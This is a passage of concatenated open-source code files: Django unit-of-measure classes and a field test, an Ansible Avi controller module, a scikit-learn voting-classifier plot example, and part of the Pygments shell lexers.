return '%s %s' % (getattr(self, self._default_unit), self._default_unit)
# **** Comparison methods ****
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.standard == other.standard
else:
return NotImplemented
def __lt__(self, other):
if isinstance(other, self.__class__):
return self.standard < other.standard
else:
return NotImplemented
# **** Operators methods ****
def __add__(self, other):
if isinstance(other, self.__class__):
return self.__class__(default_unit=self._default_unit,
**{self.STANDARD_UNIT: (self.standard + other.standard)})
else:
raise TypeError('%(class)s must be added with %(class)s' % {"class": pretty_name(self)})
def __iadd__(self, other):
if isinstance(other, self.__class__):
self.standard += other.standard
return self
else:
raise TypeError('%(class)s must be added with %(class)s' % {"class": pretty_name(self)})
def __sub__(self, other):
if isinstance(other, self.__class__):
return self.__class__(default_unit=self._default_unit,
**{self.STANDARD_UNIT: (self.standard - other.standard)})
else:
raise TypeError('%(class)s must be subtracted from %(class)s' % {"class": pretty_name(self)})
def __isub__(self, other):
if isinstance(other, self.__class__):
self.standard -= other.standard
return self
else:
raise TypeError('%(class)s must be subtracted from %(class)s' % {"class": pretty_name(self)})
def __mul__(self, other):
if isinstance(other, NUMERIC_TYPES):
return self.__class__(default_unit=self._default_unit,
**{self.STANDARD_UNIT: (self.standard * other)})
else:
raise TypeError('%(class)s must be multiplied with number' % {"class": pretty_name(self)})
def __imul__(self, other):
if isinstance(other, NUMERIC_TYPES):
self.standard *= float(other)
return self
else:
raise TypeError('%(class)s must be multiplied with number' % {"class": pretty_name(self)})
def __rmul__(self, other):
return self * other
def __truediv__(self, other):
if isinstance(other, self.__class__):
return self.standard / other.standard
if isinstance(other, NUMERIC_TYPES):
return self.__class__(default_unit=self._default_unit,
**{self.STANDARD_UNIT: (self.standard / other)})
else:
raise TypeError('%(class)s must be divided with number or %(class)s' % {"class": pretty_name(self)})
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
def __itruediv__(self, other):
if isinstance(other, NUMERIC_TYPES):
self.standard /= float(other)
return self
else:
raise TypeError('%(class)s must be divided with number' % {"class": pretty_name(self)})
def __idiv__(self, other): # Python 2 compatibility
return type(self).__itruediv__(self, other)
def __bool__(self):
return bool(self.standard)
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
def default_units(self, kwargs):
"""
Return the unit value and the default units specified
from the given keyword arguments dictionary.
"""
val = 0.0
default_unit = self.STANDARD_UNIT
for unit, value in six.iteritems(kwargs):
if not isinstance(value, float):
value = float(value)
if unit in self.UNITS:
val += self.UNITS[unit] * value
default_unit = unit
elif unit in self.ALIAS:
u = self.ALIAS[unit]
val += self.UNITS[u] * value
default_unit = u
else:
lower = unit.lower()
if lower in self.UNITS:
val += self.UNITS[lower] * value
default_unit = lower
elif lower in self.LALIAS:
u = self.LALIAS[lower]
val += self.UNITS[u] * value
default_unit = u
else:
raise AttributeError('Unknown unit type: %s' % unit)
return val, default_unit
@classmethod
def unit_attname(cls, unit_str):
"""
Retrieves the unit attribute name for the given unit string.
For example, if the given unit string is 'metre', 'm' would be returned.
An exception is raised if an attribute cannot be found.
"""
lower = unit_str.lower()
if unit_str in cls.UNITS:
return unit_str
elif lower in cls.UNITS:
return lower
elif lower in cls.LALIAS:
return cls.LALIAS[lower]
else:
raise Exception('Could not find a unit keyword associated with "%s"' % unit_str)
class Distance(MeasureBase):
STANDARD_UNIT = "m"
UNITS = {
'chain': 20.1168,
'chain_benoit': 20.116782,
'chain_sears': 20.1167645,
'british_chain_benoit': 20.1167824944,
'british_chain_sears': 20.1167651216,
'british_chain_sears_truncated': 20.116756,
'cm': 0.01,
'british_ft': 0.304799471539,
'british_yd': 0.914398414616,
'clarke_ft': 0.3047972654,
'clarke_link': 0.201166195164,
'fathom': 1.8288,
'ft': 0.3048,
'german_m': 1.0000135965,
'gold_coast_ft': 0.304799710181508,
'indian_yd': 0.914398530744,
'inch': 0.0254,
'km': 1000.0,
'link': 0.201168,
'link_benoit': 0.20116782,
'link_sears': 0.20116765,
'm': 1.0,
'mi': 1609.344,
'mm': 0.001,
'nm': 1852.0,
'nm_uk': 1853.184,
'rod': 5.0292,
'sears_yd': 0.91439841,
'survey_ft': 0.304800609601,
'um': 0.000001,
'yd': 0.9144,
}
# Unit aliases for `UNIT` terms encountered in Spatial Reference WKT.
ALIAS = {
'centimeter': 'cm',
'foot': 'ft',
'inches': 'inch',
'kilometer': 'km',
'kilometre': 'km',
'meter': 'm',
'metre': 'm',
'micrometer': 'um',
'micrometre': 'um',
'millimeter': 'mm',
'millimetre': 'mm',
'mile': 'mi',
'yard': 'yd',
'British chain (Benoit 1895 B)': 'british_chain_benoit',
'British chain (Sears 1922)': 'british_chain_sears',
'British chain (Sears 1922 truncated)': 'british_chain_sears_truncated',
'British foot (Sears 1922)': 'british_ft',
'British foot': 'british_ft',
'British yard (Sears 1922)': 'british_yd',
'British yard': 'british_yd',
"Clarke's Foot": 'clarke_ft',
"Clarke's link": 'clarke_link',
'Chain (Benoit)': 'chain_benoit',
'Chain (Sears)': 'chain_sears',
'Foot (International)': 'ft',
'German legal metre': 'german_m',
'Gold Coast foot': 'gold_coast_ft',
'Indian yard': 'indian_yd',
'Link (Benoit)': 'link_benoit',
'Link (Sears)': 'link_sears',
'Nautical Mile': 'nm',
'Nautical Mile (UK)': 'nm_uk',
'US survey foot': 'survey_ft',
'U.S. Foot': 'survey_ft',
'Yard (Indian)': 'indian_yd',
'Yard (Sears)': 'sears_yd'
}
LALIAS = {k.lower(): v for k, v in ALIAS.items()}
def __mul__(self, other):
if isinstance(other, self.__class__):
return Area(default_unit=AREA_PREFIX + self._default_unit,
**{AREA_PREFIX + self.STANDARD_UNIT: (self.standard * other.standard)})
elif isinstance(other, NUMERIC_TYPES):
return self.__class__(default_unit=self._default_unit,
**{self.STANDARD_UNIT: (self.standard * other)})
else:
raise TypeError('%(distance)s must be multiplied with number or %(distance)s' % {
"distance": pretty_name(self.__class__),
})
class Area(MeasureBase):
STANDARD_UNIT = AREA_PREFIX + Distance.STANDARD_UNIT
# Getting the square units values and the alias dictionary.
UNITS = {'%s%s' % (AREA_PREFIX, k): v ** 2 for k, v in Distance.UNITS.items()}
ALIAS = {k: '%s%s' % (AREA_PREFIX, v) for k, v in Distance.ALIAS.items()}
LALIAS = {k.lower(): v for k, v in ALIAS.items()}
def __truediv__(self, other):
if isinstance(other, NUMERIC_TYPES):
return self.__class__(default_unit=self._default_unit,
**{self.STANDARD_UNIT: (self.standard / other)})
else:
raise TypeError('%(class)s must be divided by a number' % {"class": pretty_name(self)})
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
# Shortcuts
D = Distance
A = Area
| bsd-3-clause |
willingc/oh-mainline | vendor/packages/Django/tests/modeltests/field_subclassing/fields.py | 115 | 2164 | from __future__ import unicode_literals
import json
from django.db import models
from django.utils.encoding import force_text
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Small(object):
"""
A simple class to show that non-trivial Python objects can be used as
attributes.
"""
def __init__(self, first, second):
self.first, self.second = first, second
def __str__(self):
return '%s%s' % (force_text(self.first), force_text(self.second))
class SmallField(six.with_metaclass(models.SubfieldBase, models.Field)):
"""
Turns the "Small" class into a Django field. Because of the similarities
with normal character fields and the fact that Small.__unicode__ does
something sensible, we don't need to implement a lot here.
"""
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 2
super(SmallField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return 'CharField'
def to_python(self, value):
if isinstance(value, Small):
return value
return Small(value[0], value[1])
def get_db_prep_save(self, value, connection):
return six.text_type(value)
def get_prep_lookup(self, lookup_type, value):
if lookup_type == 'exact':
return force_text(value)
if lookup_type == 'in':
return [force_text(v) for v in value]
if lookup_type == 'isnull':
return []
raise TypeError('Invalid lookup type: %r' % lookup_type)
class SmallerField(SmallField):
pass
class JSONField(six.with_metaclass(models.SubfieldBase, models.TextField)):
description = ("JSONField automatically serializes and desializes values to "
"and from JSON.")
def to_python(self, value):
if not value:
return None
if isinstance(value, six.string_types):
value = json.loads(value)
return value
def get_db_prep_save(self, value, connection):
if value is None:
return None
return json.dumps(value)
| agpl-3.0 |
benthomasson/ansible | lib/ansible/modules/network/avi/avi_controllerproperties.py | 7 | 13790 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.2
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_controllerproperties
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of ControllerProperties Avi RESTful Object
description:
- This module is used to configure ControllerProperties object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
allow_ip_forwarding:
description:
- Field introduced in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
allow_unauthenticated_apis:
description:
- Allow unauthenticated access for special apis.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
allow_unauthenticated_nodes:
description:
- Boolean flag to set allow_unauthenticated_nodes.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
api_idle_timeout:
description:
- Allowed values are 0-1440.
- Default value when not specified in API or module is interpreted by Avi Controller as 15.
appviewx_compat_mode:
description:
- Export configuration in appviewx compatibility mode.
- Field introduced in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
attach_ip_retry_interval:
description:
- Number of attach_ip_retry_interval.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
attach_ip_retry_limit:
description:
- Number of attach_ip_retry_limit.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
cluster_ip_gratuitous_arp_period:
description:
- Number of cluster_ip_gratuitous_arp_period.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
crashed_se_reboot:
description:
- Number of crashed_se_reboot.
- Default value when not specified in API or module is interpreted by Avi Controller as 900.
dead_se_detection_timer:
description:
- Number of dead_se_detection_timer.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
dns_refresh_period:
description:
- Number of dns_refresh_period.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
dummy:
description:
- Number of dummy.
fatal_error_lease_time:
description:
- Number of fatal_error_lease_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 120.
max_dead_se_in_grp:
description:
- Number of max_dead_se_in_grp.
- Default value when not specified in API or module is interpreted by Avi Controller as 1.
max_pcap_per_tenant:
description:
- Maximum number of pcap files stored per tenant.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
max_seq_vnic_failures:
description:
- Number of max_seq_vnic_failures.
- Default value when not specified in API or module is interpreted by Avi Controller as 3.
persistence_key_rotate_period:
description:
- Allowed values are 1-1051200.
- Special values are 0 - 'disabled'.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
portal_token:
description:
- Token used for uploading tech-support to portal.
- Field introduced in 16.4.6,17.1.2.
version_added: "2.4"
query_host_fail:
description:
- Number of query_host_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 180.
se_create_timeout:
description:
- Number of se_create_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 900.
se_failover_attempt_interval:
description:
- Interval between attempting failovers to an se.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
se_offline_del:
description:
- Number of se_offline_del.
- Default value when not specified in API or module is interpreted by Avi Controller as 172000.
se_vnic_cooldown:
description:
- Number of se_vnic_cooldown.
- Default value when not specified in API or module is interpreted by Avi Controller as 120.
secure_channel_cleanup_timeout:
description:
- Number of secure_channel_cleanup_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
secure_channel_controller_token_timeout:
description:
- Number of secure_channel_controller_token_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
secure_channel_se_token_timeout:
description:
- Number of secure_channel_se_token_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
seupgrade_fabric_pool_size:
description:
- Pool size used for all fabric commands during se upgrade.
- Default value when not specified in API or module is interpreted by Avi Controller as 20.
seupgrade_segroup_min_dead_timeout:
description:
- Time to wait before marking segroup upgrade as stuck.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
ssl_certificate_expiry_warning_days:
description:
- Number of days for ssl certificate expiry warning.
unresponsive_se_reboot:
description:
- Number of unresponsive_se_reboot.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
upgrade_dns_ttl:
description:
- Time to account for dns ttl during upgrade.
- This is in addition to vs_scalein_timeout_for_upgrade in se_group.
- Field introduced in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as 5.
upgrade_lease_time:
description:
- Number of upgrade_lease_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
vnic_op_fail_time:
description:
- Number of vnic_op_fail_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 180.
vs_apic_scaleout_timeout:
description:
- Time to wait for the scaled out se to become ready before marking the scaleout done, applies to apic configuration only.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
vs_awaiting_se_timeout:
description:
- Number of vs_awaiting_se_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
vs_key_rotate_period:
description:
- Allowed values are 1-1051200.
- Special values are 0 - 'disabled'.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
vs_se_bootup_fail:
description:
- Number of vs_se_bootup_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
vs_se_create_fail:
description:
- Number of vs_se_create_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 1500.
vs_se_ping_fail:
description:
- Number of vs_se_ping_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
vs_se_vnic_fail:
description:
- Number of vs_se_vnic_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
vs_se_vnic_ip_fail:
description:
- Number of vs_se_vnic_ip_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 120.
warmstart_se_reconnect_wait_time:
description:
- Number of warmstart_se_reconnect_wait_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create ControllerProperties object
avi_controllerproperties:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_controllerproperties
"""
RETURN = '''
obj:
description: ControllerProperties (api/controllerproperties) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
allow_ip_forwarding=dict(type='bool',),
allow_unauthenticated_apis=dict(type='bool',),
allow_unauthenticated_nodes=dict(type='bool',),
api_idle_timeout=dict(type='int',),
appviewx_compat_mode=dict(type='bool',),
attach_ip_retry_interval=dict(type='int',),
attach_ip_retry_limit=dict(type='int',),
cluster_ip_gratuitous_arp_period=dict(type='int',),
crashed_se_reboot=dict(type='int',),
dead_se_detection_timer=dict(type='int',),
dns_refresh_period=dict(type='int',),
dummy=dict(type='int',),
fatal_error_lease_time=dict(type='int',),
max_dead_se_in_grp=dict(type='int',),
max_pcap_per_tenant=dict(type='int',),
max_seq_vnic_failures=dict(type='int',),
persistence_key_rotate_period=dict(type='int',),
portal_token=dict(type='str', no_log=True,),
query_host_fail=dict(type='int',),
se_create_timeout=dict(type='int',),
se_failover_attempt_interval=dict(type='int',),
se_offline_del=dict(type='int',),
se_vnic_cooldown=dict(type='int',),
secure_channel_cleanup_timeout=dict(type='int',),
secure_channel_controller_token_timeout=dict(type='int',),
secure_channel_se_token_timeout=dict(type='int',),
seupgrade_fabric_pool_size=dict(type='int',),
seupgrade_segroup_min_dead_timeout=dict(type='int',),
ssl_certificate_expiry_warning_days=dict(type='list',),
unresponsive_se_reboot=dict(type='int',),
upgrade_dns_ttl=dict(type='int',),
upgrade_lease_time=dict(type='int',),
url=dict(type='str',),
uuid=dict(type='str',),
vnic_op_fail_time=dict(type='int',),
vs_apic_scaleout_timeout=dict(type='int',),
vs_awaiting_se_timeout=dict(type='int',),
vs_key_rotate_period=dict(type='int',),
vs_se_bootup_fail=dict(type='int',),
vs_se_create_fail=dict(type='int',),
vs_se_ping_fail=dict(type='int',),
vs_se_vnic_fail=dict(type='int',),
vs_se_vnic_ip_fail=dict(type='int',),
warmstart_se_reconnect_wait_time=dict(type='int',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'controllerproperties',
set(['portal_token']))
if __name__ == '__main__':
main()
| gpl-3.0 |
hdmetor/scikit-learn | examples/ensemble/plot_voting_probas.py | 316 | 2824 | """
===========================================================
Plot class probabilities calculated by the VotingClassifier
===========================================================
Plot the class probabilities of the first sample in a toy dataset
predicted by three different classifiers and averaged by the
`VotingClassifier`.
First, three examplary classifiers are initialized (`LogisticRegression`,
`GaussianNB`, and `RandomForestClassifier`) and used to initialize a
soft-voting `VotingClassifier` with weights `[1, 1, 5]`, which means that
the predicted probabilities of the `RandomForestClassifier` count 5 times
as much as the weights of the other classifiers when the averaged probability
is calculated.
To visualize the probability weighting, we fit each classifier on the training
set and plot the predicted class probabilities for the first sample in this
example dataset.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
clf3 = GaussianNB()
X = np.array([[-1.0, -1.0], [-1.2, -1.4], [-3.4, -2.2], [1.1, 1.2]])
y = np.array([1, 1, 2, 2])
eclf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='soft',
weights=[1, 1, 5])
# predict class probabilities for all classifiers
probas = [c.fit(X, y).predict_proba(X) for c in (clf1, clf2, clf3, eclf)]
# get class probabilities for the first sample in the dataset
class1_1 = [pr[0, 0] for pr in probas]
class2_1 = [pr[0, 1] for pr in probas]
# plotting
N = 4 # number of groups
ind = np.arange(N) # group positions
width = 0.35 # bar width
fig, ax = plt.subplots()
# bars for classifier 1-3
p1 = ax.bar(ind, np.hstack(([class1_1[:-1], [0]])), width, color='green')
p2 = ax.bar(ind + width, np.hstack(([class2_1[:-1], [0]])), width, color='lightgreen')
# bars for VotingClassifier
p3 = ax.bar(ind, [0, 0, 0, class1_1[-1]], width, color='blue')
p4 = ax.bar(ind + width, [0, 0, 0, class2_1[-1]], width, color='steelblue')
# plot annotations
plt.axvline(2.8, color='k', linestyle='dashed')
ax.set_xticks(ind + width)
ax.set_xticklabels(['LogisticRegression\nweight 1',
'GaussianNB\nweight 1',
'RandomForestClassifier\nweight 5',
'VotingClassifier\n(average probabilities)'],
rotation=40,
ha='right')
plt.ylim([0, 1])
plt.title('Class probabilities for sample 1 by different classifiers')
plt.legend([p1[0], p2[0]], ['class 1', 'class 2'], loc='upper left')
plt.show()
| bsd-3-clause |
ego008/ijd8 | bae/pygments/lexers/shell.py | 71 | 14782 | # -*- coding: utf-8 -*-
"""
pygments.lexers.shell
~~~~~~~~~~~~~~~~~~~~~
Lexers for various shells.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, include
from pygments.token import Punctuation, \
Text, Comment, Operator, Keyword, Name, String, Number, Generic
from pygments.util import shebang_matches
__all__ = ['BashLexer', 'BashSessionLexer', 'TcshLexer', 'BatchLexer',
'PowerShellLexer', 'ShellSessionLexer']
line_re = re.compile('.*?\n')
class BashLexer(RegexLexer):
"""
Lexer for (ba|k|)sh shell scripts.
*New in Pygments 0.6.*
"""
name = 'Bash'
aliases = ['bash', 'sh', 'ksh']
filenames = ['*.sh', '*.ksh', '*.bash', '*.ebuild', '*.eclass',
'.bashrc', 'bashrc', '.bash_*', 'bash_*']
mimetypes = ['application/x-sh', 'application/x-shellscript']
tokens = {
'root': [
include('basic'),
(r'\$\(\(', Keyword, 'math'),
(r'\$\(', Keyword, 'paren'),
(r'\${#?', Keyword, 'curly'),
(r'`', String.Backtick, 'backticks'),
include('data'),
],
'basic': [
(r'\b(if|fi|else|while|do|done|for|then|return|function|case|'
r'select|continue|until|esac|elif)\s*\b',
Keyword),
(r'\b(alias|bg|bind|break|builtin|caller|cd|command|compgen|'
r'complete|declare|dirs|disown|echo|enable|eval|exec|exit|'
r'export|false|fc|fg|getopts|hash|help|history|jobs|kill|let|'
r'local|logout|popd|printf|pushd|pwd|read|readonly|set|shift|'
r'shopt|source|suspend|test|time|times|trap|true|type|typeset|'
r'ulimit|umask|unalias|unset|wait)\s*\b(?!\.)',
Name.Builtin),
(r'#.*\n', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]', Operator),
(r'<<<', Operator), # here-string
(r'<<-?\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r'&&|\|\|', Operator),
],
'data': [
(r'(?s)\$?"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)\$?'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r';', Text),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\<]+', Text),
(r'\d+(?= |\Z)', Number),
(r'\$#?(\w+|.)', Name.Variable),
(r'<', Text),
],
'curly': [
(r'}', Keyword, '#pop'),
(r':-', Keyword),
(r'[a-zA-Z0-9_]+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
'math': [
(r'\)\)', Keyword, '#pop'),
(r'[-+*/%^|&]|\*\*|\|\|', Operator),
(r'\d+', Number),
include('root'),
],
'backticks': [
(r'`', String.Backtick, '#pop'),
include('root'),
],
}
def analyse_text(text):
return shebang_matches(text, r'(ba|z|)sh')
class BashSessionLexer(Lexer):
"""
Lexer for simplistic shell sessions.
*New in Pygments 1.1.*
"""
name = 'Bash Session'
aliases = ['console']
filenames = ['*.sh-session']
mimetypes = ['application/x-shell-session']
def get_tokens_unprocessed(self, text):
bashlexer = BashLexer(**self.options)
pos = 0
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
m = re.match(r'^((?:\(\S+\))?(?:|sh\S*?|\w+\S+[@:]\S+(?:\s+\S+)'
r'?|\[\S+[@:][^\n]+\].+)[$#%])(.*\n?)' , line)
if m:
# To support output lexers (say diff output), the output
# needs to be broken by prompts whenever the output lexer
# changes.
if not insertions:
pos = match.start()
insertions.append((len(curcode),
[(0, Generic.Prompt, m.group(1))]))
curcode += m.group(2)
elif line.startswith('>'):
insertions.append((len(curcode),
[(0, Generic.Prompt, line[:1])]))
curcode += line[1:]
else:
if insertions:
toks = bashlexer.get_tokens_unprocessed(curcode)
for i, t, v in do_insertions(insertions, toks):
yield pos+i, t, v
yield match.start(), Generic.Output, line
insertions = []
curcode = ''
if insertions:
for i, t, v in do_insertions(insertions,
bashlexer.get_tokens_unprocessed(curcode)):
yield pos+i, t, v
class ShellSessionLexer(Lexer):
"""
Lexer for shell sessions that works with different command prompts
*New in Pygments 1.6.*
"""
name = 'Shell Session'
aliases = ['shell-session']
filenames = ['*.shell-session']
mimetypes = ['application/x-sh-session']
def get_tokens_unprocessed(self, text):
bashlexer = BashLexer(**self.options)
pos = 0
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
m = re.match(r'^((?:\[?\S+@[^$#%]+)[$#%])(.*\n?)', line)
if m:
# To support output lexers (say diff output), the output
# needs to be broken by prompts whenever the output lexer
# changes.
if not insertions:
pos = match.start()
insertions.append((len(curcode),
[(0, Generic.Prompt, m.group(1))]))
curcode += m.group(2)
else:
if insertions:
toks = bashlexer.get_tokens_unprocessed(curcode)
for i, t, v in do_insertions(insertions, toks):
yield pos+i, t, v
yield match.start(), Generic.Output, line
insertions = []
curcode = ''
if insertions:
for i, t, v in do_insertions(insertions,
bashlexer.get_tokens_unprocessed(curcode)):
yield pos+i, t, v
class BatchLexer(RegexLexer):
"""
Lexer for the DOS/Windows Batch file format.
*New in Pygments 0.7.*
"""
name = 'Batchfile'
aliases = ['bat']
filenames = ['*.bat', '*.cmd']
mimetypes = ['application/x-dos-batch']
flags = re.MULTILINE | re.IGNORECASE
tokens = {
'root': [
# Lines can start with @ to prevent echo
(r'^\s*@', Punctuation),
(r'^(\s*)(rem\s.*)$', bygroups(Text, Comment)),
(r'".*?"', String.Double),
(r"'.*?'", String.Single),
# If made more specific, make sure you still allow expansions
# like %~$VAR:zlt
(r'%%?[~$:\w]+%?', Name.Variable),
(r'::.*', Comment), # Technically :: only works at BOL
(r'(set)(\s+)(\w+)', bygroups(Keyword, Text, Name.Variable)),
(r'(call)(\s+)(:\w+)', bygroups(Keyword, Text, Name.Label)),
(r'(goto)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
(r'\b(set|call|echo|on|off|endlocal|for|do|goto|if|pause|'
r'setlocal|shift|errorlevel|exist|defined|cmdextversion|'
r'errorlevel|else|cd|md|del|deltree|cls|choice)\b', Keyword),
(r'\b(equ|neq|lss|leq|gtr|geq)\b', Operator),
include('basic'),
(r'.', Text),
],
'echo': [
# Escapes only valid within echo args?
(r'\^\^|\^<|\^>|\^\|', String.Escape),
(r'\n', Text, '#pop'),
include('basic'),
(r'[^\'"^]+', Text),
],
'basic': [
(r'".*?"', String.Double),
(r"'.*?'", String.Single),
(r'`.*?`', String.Backtick),
(r'-?\d+', Number),
(r',', Punctuation),
(r'=', Operator),
(r'/\S+', Name),
(r':\w+', Name.Label),
(r'\w:\w+', Text),
(r'([<>|])(\s*)(\w+)', bygroups(Punctuation, Text, Name)),
],
}
class TcshLexer(RegexLexer):
"""
Lexer for tcsh scripts.
*New in Pygments 0.10.*
"""
name = 'Tcsh'
aliases = ['tcsh', 'csh']
filenames = ['*.tcsh', '*.csh']
mimetypes = ['application/x-csh']
tokens = {
'root': [
include('basic'),
(r'\$\(', Keyword, 'paren'),
(r'\${#?', Keyword, 'curly'),
(r'`', String.Backtick, 'backticks'),
include('data'),
],
'basic': [
(r'\b(if|endif|else|while|then|foreach|case|default|'
r'continue|goto|breaksw|end|switch|endsw)\s*\b',
Keyword),
(r'\b(alias|alloc|bg|bindkey|break|builtins|bye|caller|cd|chdir|'
r'complete|dirs|echo|echotc|eval|exec|exit|fg|filetest|getxvers|'
r'glob|getspath|hashstat|history|hup|inlib|jobs|kill|'
r'limit|log|login|logout|ls-F|migrate|newgrp|nice|nohup|notify|'
r'onintr|popd|printenv|pushd|rehash|repeat|rootnode|popd|pushd|'
r'set|shift|sched|setenv|setpath|settc|setty|setxvers|shift|'
r'source|stop|suspend|source|suspend|telltc|time|'
r'umask|unalias|uncomplete|unhash|universe|unlimit|unset|unsetenv|'
r'ver|wait|warp|watchlog|where|which)\s*\b',
Name.Builtin),
(r'#.*\n', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]+', Operator),
(r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
],
'data': [
(r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\]+', Text),
(r'\d+(?= |\Z)', Number),
(r'\$#?(\w+|.)', Name.Variable),
],
'curly': [
(r'}', Keyword, '#pop'),
(r':-', Keyword),
(r'[a-zA-Z0-9_]+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
'backticks': [
(r'`', String.Backtick, '#pop'),
include('root'),
],
}
class PowerShellLexer(RegexLexer):
"""
For Windows PowerShell code.
*New in Pygments 1.5.*
"""
name = 'PowerShell'
aliases = ['powershell', 'posh', 'ps1']
filenames = ['*.ps1']
mimetypes = ['text/x-powershell']
flags = re.DOTALL | re.IGNORECASE | re.MULTILINE
keywords = (
'while validateset validaterange validatepattern validatelength '
'validatecount until trap switch return ref process param parameter in '
'if global: function foreach for finally filter end elseif else '
'dynamicparam do default continue cmdletbinding break begin alias \\? '
'% #script #private #local #global mandatory parametersetname position '
'valuefrompipeline valuefrompipelinebypropertyname '
'valuefromremainingarguments helpmessage try catch').split()
operators = (
'and as band bnot bor bxor casesensitive ccontains ceq cge cgt cle '
'clike clt cmatch cne cnotcontains cnotlike cnotmatch contains '
'creplace eq exact f file ge gt icontains ieq ige igt ile ilike ilt '
'imatch ine inotcontains inotlike inotmatch ireplace is isnot le like '
